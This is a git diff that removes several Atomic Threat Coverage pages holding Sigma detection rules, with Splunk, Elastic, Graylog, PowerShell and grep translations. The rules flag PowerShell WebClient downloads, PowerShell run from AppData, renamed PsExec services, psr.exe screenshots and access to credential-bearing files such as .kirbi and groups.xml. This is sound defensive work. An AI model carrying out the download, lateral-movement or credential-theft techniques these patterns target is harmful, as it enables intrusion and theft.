-grep -P '^(?:.*.*\\$Recycle\.bin|.*.*\Users\Public\\.*|.*C:\Perflogs\\.*|.*.*\Windows\Fonts\\.*|.*.*\Windows\IME\\.*|.*.*\Windows\addins\\.*|.*.*\Windows\debug\\.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_ps_appdata.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_ps_appdata.md
deleted file mode 100644
index 3c56184..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_ps_appdata.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | PowerShell Script Run in AppData       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Administrative scripts</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/JohnLaTwC/status/1082851155481288706](https://twitter.com/JohnLaTwC/status/1082851155481288706)</li><li>[https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03](https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: PowerShell Script Run in AppData
-id: ac175779-025a-4f12-98b0-acdaeb77ea85
-status: experimental
-description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
-references:
-    - https://twitter.com/JohnLaTwC/status/1082851155481288706
-    - https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-author: Florian Roth
-date: 2019/01/09
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '* /c powershell*\AppData\Local\\*'
-            - '* /c powershell*\AppData\Roaming\\*'
-    condition: selection
-falsepositives:
-    - Administrative scripts
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.* /c powershell.*\\AppData\\Local\\.*" -or $_.message -match "CommandLine.*.* /c powershell.*\\AppData\\Roaming\\.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\ \/c\ powershell*\\AppData\\Local\\* OR *\ \/c\ powershell*\\AppData\\Roaming\\*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/ac175779-025a-4f12-98b0-acdaeb77ea85 <<EOF
-{
-  "metadata": {
-    "title": "PowerShell Script Run in AppData",
-    "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\ \\/c\\ powershell*\\\\AppData\\\\Local\\\\* OR *\\ \\/c\\ powershell*\\\\AppData\\\\Roaming\\\\*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\ \\/c\\ powershell*\\\\AppData\\\\Local\\\\* OR *\\ \\/c\\ powershell*\\\\AppData\\\\Roaming\\\\*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'PowerShell Script Run in AppData'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(* \/c powershell*\\AppData\\Local\\* * \/c powershell*\\AppData\\Roaming\\*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="* /c powershell*\\AppData\\Local\\*" OR CommandLine="* /c powershell*\\AppData\\Roaming\\*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["* /c powershell*\\AppData\\Local\\*", "* /c powershell*\\AppData\\Roaming\\*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.* /c powershell.*\AppData\Local\\.*|.*.* /c powershell.*\AppData\Roaming\\.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_ps_downloadfile.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_ps_downloadfile.md
deleted file mode 100644
index e70d3ac..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_ps_downloadfile.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | PowerShell DownloadFile       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html](https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: PowerShell DownloadFile
-id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5
-status: experimental
-description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
-references:
-    - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
-author: Florian Roth
-date: 2020/03/25
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|contains|all:
-            - 'powershell'
-            - '.DownloadFile'
-            - 'System.Net.WebClient'
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*powershell.*" -and $_.message -match "CommandLine.*.*.DownloadFile.*" -and $_.message -match "CommandLine.*.*System.Net.WebClient.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*powershell* AND winlog.event_data.CommandLine.keyword:*.DownloadFile* AND winlog.event_data.CommandLine.keyword:*System.Net.WebClient*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/8f70ac5f-1f6f-4f8e-b454-db19561216c5 <<EOF
-{
-  "metadata": {
-    "title": "PowerShell DownloadFile",
-    "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:*powershell* AND winlog.event_data.CommandLine.keyword:*.DownloadFile* AND winlog.event_data.CommandLine.keyword:*System.Net.WebClient*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*powershell* AND winlog.event_data.CommandLine.keyword:*.DownloadFile* AND winlog.event_data.CommandLine.keyword:*System.Net.WebClient*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'PowerShell DownloadFile'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:*powershell* AND CommandLine.keyword:*.DownloadFile* AND CommandLine.keyword:*System.Net.WebClient*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*powershell*" CommandLine="*.DownloadFile*" CommandLine="*System.Net.WebClient*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*powershell*" CommandLine="*.DownloadFile*" CommandLine="*System.Net.WebClient*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*powershell.*)(?=.*.*\.DownloadFile.*)(?=.*.*System\.Net\.WebClient.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_psexec.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_psexec.md
deleted file mode 100644
index bc19bd9..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_psexec.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | Suspicious PsExec Execution       |
-|:-------------------------|:------------------|
-| **Description**          | detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1077: Windows Admin Shares](https://attack.mitre.org/techniques/T1077)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>nothing observed so far</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html](https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html)</li></ul>  |
-| **Author**               | Samir Bousseaden |
-| Other Tags           | <ul><li>attack.t1021.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious PsExec Execution
-id: c462f537-a1e3-41a6-b5fc-b2c2cef9bf82
-description: detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one
-author: Samir Bousseaden
-date: 2019/04/03
-references:
-    - https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html
-tags:
-    - attack.lateral_movement
-    - attack.t1077
-    - attack.t1021.002
-logsource:
-    product: windows
-    service: security
-    description: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure'
-detection:
-    selection1:
-        EventID: 5145
-        ShareName: \\*\IPC$
-        RelativeTargetName:
-            - '*-stdin'
-            - '*-stdout'
-            - '*-stderr'
-    selection2:
-        EventID: 5145
-        ShareName: \\*\IPC$
-        RelativeTargetName: 'PSEXESVC*'
-    condition: selection1 and not selection2
-falsepositives:
-    - nothing observed so far
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "5145" -and $_.message -match "ShareName.*\\.*\\IPC$" -and ($_.message -match "RelativeTargetName.*.*-stdin" -or $_.message -match "RelativeTargetName.*.*-stdout" -or $_.message -match "RelativeTargetName.*.*-stderr")) -and  -not ($_.ID -eq "5145" -and $_.message -match "ShareName.*\\.*\\IPC$" -and $_.message -match "RelativeTargetName.*PSEXESVC.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND (winlog.event_id:"5145" AND winlog.event_data.ShareName.keyword:\\*\\IPC$ AND RelativeTargetName.keyword:(*\-stdin OR *\-stdout OR *\-stderr)) AND (NOT (winlog.event_id:"5145" AND winlog.event_data.ShareName.keyword:\\*\\IPC$ AND RelativeTargetName.keyword:PSEXESVC*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/c462f537-a1e3-41a6-b5fc-b2c2cef9bf82 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious PsExec Execution",
-    "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1077",
-      "attack.t1021.002"
-    ],
-    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:\\\\*\\\\IPC$ AND RelativeTargetName.keyword:(*\\-stdin OR *\\-stdout OR *\\-stderr)) AND (NOT (winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:\\\\*\\\\IPC$ AND RelativeTargetName.keyword:PSEXESVC*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:\\\\*\\\\IPC$ AND RelativeTargetName.keyword:(*\\-stdin OR *\\-stdout OR *\\-stderr)) AND (NOT (winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:\\\\*\\\\IPC$ AND RelativeTargetName.keyword:PSEXESVC*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious PsExec Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"5145" AND ShareName.keyword:\\*\\IPC$ AND RelativeTargetName.keyword:(*\-stdin *\-stdout *\-stderr)) AND (NOT (EventID:"5145" AND ShareName.keyword:\\*\\IPC$ AND RelativeTargetName.keyword:PSEXESVC*)))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="5145" ShareName="\\*\\IPC$" (RelativeTargetName="*-stdin" OR RelativeTargetName="*-stdout" OR RelativeTargetName="*-stderr")) NOT (EventCode="5145" ShareName="\\*\\IPC$" RelativeTargetName="PSEXESVC*"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" (event_id="5145" ShareName="\\*\\IPC$" RelativeTargetName IN ["*-stdin", "*-stdout", "*-stderr"])  -(event_id="5145" ShareName="\\*\\IPC$" RelativeTargetName="PSEXESVC*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*5145)(?=.*\\.*\IPC\$)(?=.*(?:.*.*-stdin|.*.*-stdout|.*.*-stderr))))(?=.*(?!.*(?:.*(?=.*5145)(?=.*\\.*\IPC\$)(?=.*PSEXESVC.*)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_psr_capture_screenshots.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_psr_capture_screenshots.md
deleted file mode 100644
index b1e3abd..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_psr_capture_screenshots.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Psr.exe Capture Screenshots       |
-|:-------------------------|:------------------|
-| **Description**          | The psr.exe captures desktop screenshots and saves them on the local machine |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Psr.yml](https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Psr.yml)</li><li>[https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf](https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf)</li></ul>  |
-| **Author**               | Beyu Denis, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Psr.exe Capture Screenshots
-id: 2158f96f-43c2-43cb-952a-ab4580f32382
-status: experimental
-description: The psr.exe captures desktop screenshots and saves them on the local machine
-references:
-    - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Psr.yml
-    - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
-author: Beyu Denis, oscd.community
-date: 2019/10/12
-modified: 2019/11/04
-tags:
-    - attack.persistence
-    - attack.t1218
-level: medium
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\Psr.exe'
-        CommandLine|contains: '/start'
-    condition: selection
-falsepositives:
-    - Unknown
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\Psr.exe" -and $_.message -match "CommandLine.*.*/start.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\Psr.exe AND winlog.event_data.CommandLine.keyword:*\/start*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/2158f96f-43c2-43cb-952a-ab4580f32382 <<EOF
-{
-  "metadata": {
-    "title": "Psr.exe Capture Screenshots",
-    "description": "The psr.exe captures desktop screenshots and saves them on the local machine",
-    "tags": [
-      "attack.persistence",
-      "attack.t1218"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\Psr.exe AND winlog.event_data.CommandLine.keyword:*\\/start*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\Psr.exe AND winlog.event_data.CommandLine.keyword:*\\/start*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Psr.exe Capture Screenshots'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\Psr.exe AND CommandLine.keyword:*\/start*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\Psr.exe" CommandLine="*/start*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\Psr.exe" CommandLine="*/start*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\Psr\.exe)(?=.*.*/start.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_raccess_sensitive_fext.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_raccess_sensitive_fext.md
deleted file mode 100644
index 13c9c70..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_raccess_sensitive_fext.md
+++ /dev/null
@@ -1,187 +0,0 @@
-| Title                    | Suspicious Access to Sensitive File Extensions       |
-|:-------------------------|:------------------|
-| **Description**          | Detects known sensitive file extensions |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0009: Collection](https://attack.mitre.org/tactics/TA0009)</li></ul>  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Help Desk operator doing backup or re-imaging end user machine or pentest or backup software</li><li>Users working with these data types or exchanging message files</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Samir Bousseaden |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Access to Sensitive File Extensions
-id: 91c945bc-2ad1-4799-a591-4d00198a1215
-description: Detects known sensitive file extensions
-author: Samir Bousseaden
-date: 2019/04/03
-tags:
-    - attack.collection
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID:
-            - 5145
-        RelativeTargetName:
-            - '*.pst'
-            - '*.ost'
-            - '*.msg'
-            - '*.nst'
-            - '*.oab'
-            - '*.edb'
-            - '*.nsf'
-            - '*.bak'
-            - '*.dmp'
-            - '*.kirbi'
-            - '*\groups.xml'
-            - '*.rdp'
-    condition: selection
-fields:
-    - ComputerName
-    - SubjectDomainName
-    - SubjectUserName
-    - RelativeTargetName
-falsepositives:
-    - Help Desk operator doing backup or re-imaging end user machine or pentest or backup software
-    - Users working with these data types or exchanging message files
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "5145") -and ($_.message -match "RelativeTargetName.*.*.pst" -or $_.message -match "RelativeTargetName.*.*.ost" -or $_.message -match "RelativeTargetName.*.*.msg" -or $_.message -match "RelativeTargetName.*.*.nst" -or $_.message -match "RelativeTargetName.*.*.oab" -or $_.message -match "RelativeTargetName.*.*.edb" -or $_.message -match "RelativeTargetName.*.*.nsf" -or $_.message -match "RelativeTargetName.*.*.bak" -or $_.message -match "RelativeTargetName.*.*.dmp" -or $_.message -match "RelativeTargetName.*.*.kirbi" -or $_.message -match "RelativeTargetName.*.*\\groups.xml" -or $_.message -match "RelativeTargetName.*.*.rdp")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:("5145") AND RelativeTargetName.keyword:(*.pst OR *.ost OR *.msg OR *.nst OR *.oab OR *.edb OR *.nsf OR *.bak OR *.dmp OR *.kirbi OR *\\groups.xml OR *.rdp))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/91c945bc-2ad1-4799-a591-4d00198a1215 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Access to Sensitive File Extensions",
-    "description": "Detects known sensitive file extensions",
-    "tags": [
-      "attack.collection"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"5145\") AND RelativeTargetName.keyword:(*.pst OR *.ost OR *.msg OR *.nst OR *.oab OR *.edb OR *.nsf OR *.bak OR *.dmp OR *.kirbi OR *\\\\groups.xml OR *.rdp))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"5145\") AND RelativeTargetName.keyword:(*.pst OR *.ost OR *.msg OR *.nst OR *.oab OR *.edb OR *.nsf OR *.bak OR *.dmp OR *.kirbi OR *\\\\groups.xml OR *.rdp))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Access to Sensitive File Extensions'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      ComputerName = {{_source.ComputerName}}\n SubjectDomainName = {{_source.SubjectDomainName}}\n   SubjectUserName = {{_source.SubjectUserName}}\nRelativeTargetName = {{_source.RelativeTargetName}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:("5145") AND RelativeTargetName.keyword:(*.pst *.ost *.msg *.nst *.oab *.edb *.nsf *.bak *.dmp *.kirbi *\\groups.xml *.rdp))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="5145") (RelativeTargetName="*.pst" OR RelativeTargetName="*.ost" OR RelativeTargetName="*.msg" OR RelativeTargetName="*.nst" OR RelativeTargetName="*.oab" OR RelativeTargetName="*.edb" OR RelativeTargetName="*.nsf" OR RelativeTargetName="*.bak" OR RelativeTargetName="*.dmp" OR RelativeTargetName="*.kirbi" OR RelativeTargetName="*\\groups.xml" OR RelativeTargetName="*.rdp")) | table ComputerName,SubjectDomainName,SubjectUserName,RelativeTargetName
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id IN ["5145"] RelativeTargetName IN ["*.pst", "*.ost", "*.msg", "*.nst", "*.oab", "*.edb", "*.nsf", "*.bak", "*.dmp", "*.kirbi", "*\\groups.xml", "*.rdp"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*5145))(?=.*(?:.*.*\.pst|.*.*\.ost|.*.*\.msg|.*.*\.nst|.*.*\.oab|.*.*\.edb|.*.*\.nsf|.*.*\.bak|.*.*\.dmp|.*.*\.kirbi|.*.*\groups\.xml|.*.*\.rdp)))'
-```
-
-
-
